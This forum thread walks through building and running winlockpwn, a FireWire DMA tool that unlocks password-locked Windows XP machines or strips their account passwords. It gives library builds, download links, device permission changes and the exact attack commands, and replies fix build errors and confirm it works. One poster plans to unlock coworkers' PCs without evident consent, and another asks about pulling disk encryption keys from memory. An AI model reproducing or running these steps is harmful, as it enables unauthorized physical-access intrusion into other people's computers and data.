Tutorial Winlockpwn

[jonah_15]

Adam Boileau (hxxp://wwx.storm.net.nz/projects/16) recently released source code for a tool winlockpwn that can unlock a password locked Windows machine in seconds.

Timothy Legge wrote some instructions on how to install this and get winlockpwn working on Ubuntu. I’ve used Timothy’s original document to document how to get the tool working on Backtrack 2 & Backtrack3 Beta.

Thanks

Jonah_15

Replace hxxp with http & wwx with www

Step 1

First we need to install the required libraries:

Libraw 1394 v1.3.0

hxxp://linux1394.org/dl/libraw1394-1.3.0.tar.gz
tar xvfz libraw1394-1.3.0.tar.gz
cd libraw1394-1.3.0
./configure
make
make dev
make install

Step 2

Install Swig

hxxp://downloads.sourceforge.net/swig-1.3.34.tar.gz
tar xvfz swig-1.3.34.tar.gz
cd swig-1.3.34
./configure
make
make install

Step 3

Install Python 2.3

hxxp://wwx.python.org/ftp/python/2.3.6/Python-2.3.6.tgz
tar xvf Python-2.3.6.tar
mv Python-2.3.6 python-2.3
cd python-2.3
./configure
make
make install

This will install python in /usr/local which means you need to update each script to reference this location.

Step 4

search for and comment out the__attribute__ ((deprecated)); and be sure to put an ending semicolon on the previous line

vi /usr/local/include/libraw1394/raw1394.h

Step 5

download the software from hxxp://wwx.storm.net.nz/projects/16

hxxp://wwx.storm.net.nz/static/files...394-1.0.tar.gz
tar xvfz pythonraw1394-1.0.tar.gz
cd pythonraw1394
wget hxxp://wwx.storm.net.nz/static/files/winlockpwn
chmod +x ./winlockpwn
vi Makefile (reference /usr/local instead of /usr for python)
make

Step 6

load the module and set some permissions:

modprobe raw1394
chmod 666 /dev/raw1394

Step 7

Copy libraw1394.so.8 to to /lib:

cd /usr/local/lib/
cp libraw1394.so.8 /lib

Step 8

Plug in the firewire cable into both your backtrack system and the target windows system.

Step 9

run businfo to check the port configurations:
vi businfo (update the location of python to be /usr/local/bin/python)
./businfo

Step 10

vi romtool (update the location of python to be /usr/local/bin/python)
cp libraw1394.so.8 /lib
./romtool -s 0 ipod.csr

Step 11

vi winlockpwn (update the location of python to be /usr/local/bin/python)
./winlockpwn 0 1 3

[williamc]

Is it necessary to install python 2.3 when you already have 2.5? I ask because I'm getting an error at this step:

wget hxxp://wwx.storm.net.nz/static/files/winlockpwn
chmod +x ./winlockpwn
vi Makefile (reference /usr/local instead of /usr for python)
make
make: *** No rule to make target '/usr/local/include/python2.5', needed by '_raw1394.so'. Stop.

William

[theprez98]

Quote:

Originally Posted by williamc

Is it necessary to install python 2.3 when you already have 2.5? I ask because I'm getting an error at this step:

wget hxxp://wwx.storm.net.nz/static/files/winlockpwn
chmod +x ./winlockpwn
vi Makefile (reference /usr/local instead of /usr for python)
make
make: *** No rule to make target '/usr/local/include/python2.5', needed by '_raw1394.so'. Stop.

William

Have you considered changing the reference in the makefile to 2.5 instead of 2.3?

[williamc]

yes, the makefile references python 2.5. Any other ideas? Anyone get this to work following the tutorial?

[jonah_15]

I also had problems with Python 2.5 but had no issues with Python 2.3

[williamc]

I got it working with Python 2.5. Here are the modified steps:

Code:

cd /pythonraw1394
nano Makefile
# modify lines as follows:
_raw1394.so: raw1394_wrap.c /usr/include/python2.5
     $(CC) -Wall -shared -fPIC -I/usr/include/python2.5 -I/usr/local/include/libraw1394 raw1394_wrap.c -lraw1394 -o _raw1394.so

No other modification to the install were needed. I didnt modify businfo or winlockpwn.

I successfully wiped the password for a locked Windows XP SP2 machine! Ctrl+Alt+Del and Enter. No password needed.

Update:
After running this successfully, I am unable to run it again without restarting Backtrack. I believe the businfo retains the settings for the PC you first plug into. Any way to clear the 1394 settings (maybe take the device down?) and bring it back up in the clear?

William

[jonah_15]

What I normally do is go into windows device manager on the target and remove the ipod, After I've done this and plugged the firewire cable back in i can successfully run the attack again on the same windows host.

I've not needed to reboot backtrack.

Nice job on Python 2.5

[williamc]

I'm looking to get this working on Vista. From http://storm.net.nz/projects/16
"people successfully attacking Vista using a slightly modified msv1_0.dll technique"

I'm researching this, but if anyone can shed some light on it, please do. I've purchased a cardbus firewire card for use on PC's that dont have Firewire ports. You can plug it into a locked PC and the OS will install the drivers. Then just run winlockpwn and your in! Guys in my office have disabled Firewire in the BIOS and set a password. Now I'll spend a lunch unlocking everyone's PC. What a surprise when they get back, hehe.

An important note, if your running this, use winlockpwn 0 1 2 instead of 0 1 3. The 3 option removes the password on all the accounts which may cause some "issues" if your in a corporate environment. the 2 option only unlocks the PC, should be enough for whatever mischief your planning (and have permission to do so).

William

[spudgunman]

anyone get this to work? (not the program but the pwnage)

i get this error

IOError: [Errno 22] Invalid argument


from firewire.py, line 693: "If a node doesn't feel like fulfilling a request, it will raise an IOError."


now if you unplug the fw and plug it back in repeatedly running the script it will start scanning memory only to end with a device busy

seems that the "money time" is when the device is detected as a "Hard Drive" you start scanning the memory at that point. then the ipod comes in and all work ends

same issue on two computers

what are people getting this to work on?


also - i understand the idea, could this also work for gathering all the memory and getting the key for the encrypted HDD?

[jonah_15]

I've successfully tested it on Sony kit, a number of Dells and a Tosh running Windows XP Sp2. I do have a couple of Dell XPS's which it's failed on as it blue screens the devices.

Results I’ve had running it on Vista machines (I know this particular version of the tool is not for Vista) is that it also blue screens.

I know you have tested against 2 computers so far are they the same make?